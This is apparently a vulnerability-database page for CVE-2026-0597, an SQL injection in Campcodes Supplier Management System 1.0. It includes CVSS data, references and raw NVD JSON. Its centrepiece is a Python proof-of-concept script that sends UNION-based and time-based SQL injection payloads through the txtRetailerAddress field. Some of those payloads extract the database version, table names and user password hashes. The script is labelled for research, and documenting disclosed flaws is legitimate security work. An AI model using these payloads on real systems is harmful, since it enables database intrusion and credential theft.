CVE-2026-0597

Description

A flaw has been found in Campcodes Supplier Management System 1.0. Affected by this issue is some unknown functionality of the file /retailer/edit_profile.php. This manipulation of the argument txtRetailerAddress causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Supplier Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0597 SQL Injection PoC
# Target: Campcodes Supplier Management System 1.0
# Endpoint: /retailer/edit_profile.php
# Parameter: txtRetailerAddress

import requests
import sys

target_url = "http://target.com/retailer/edit_profile.php"

# Authentication credentials (low-privilege user)
cookies = {
    "PHPSESSID": "your_session_id_here"
}

# SQL Injection Payloads
payloads = [
    # Basic injection test - triggers SQL error
    "'",
    # Union-based injection to extract database version
    "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- -",
    # Extract current database and user
    "' UNION SELECT NULL,database(),user(),NULL,NULL,NULL,NULL,NULL-- -",
    # Enumerate tables in current database
    "' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -",
    # Extract users table data
    "' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL FROM users-- -",
    # Time-based blind injection for data extraction
    "' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"
]

def exploit_sqli(payload):
    data = {
        "txtRetailerAddress": payload,
        "btnSubmit": "Update"
    }
    try:
        response = requests.post(target_url, data=data, cookies=cookies, timeout=10)
        print(f"[*] Payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[!] Potential SQL injection detected!")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2026-0597 SQL Injection PoC")
    print("=" * 50)
    for payload in payloads:
        exploit_sqli(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0597
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0597
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0597/
[4] VulDB https://vuldb.com/cve/CVE-2026-0597
[5] https://github.com/dhy-spec/cve/issues/1
[6] https://vuldb.com/?ctiid.339506
[7] https://vuldb.com/?id.339506
[8] https://vuldb.com/?submit.731433
[9] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0597", "sourceIdentifier": "[email protected]", "published": "2026-01-05T15:15:45.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Campcodes Supplier Management System 1.0. Affected by this issue is some unknown functionality of the file /retailer/edit_profile.php. This manipulation of the argument txtRetailerAddress causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "836654A6-0614-4B2F-A556-E005AF4C7DE1"}]}]}], "references": [{"url": "https://github.com/dhy-spec/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339506", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339506", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.731433", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}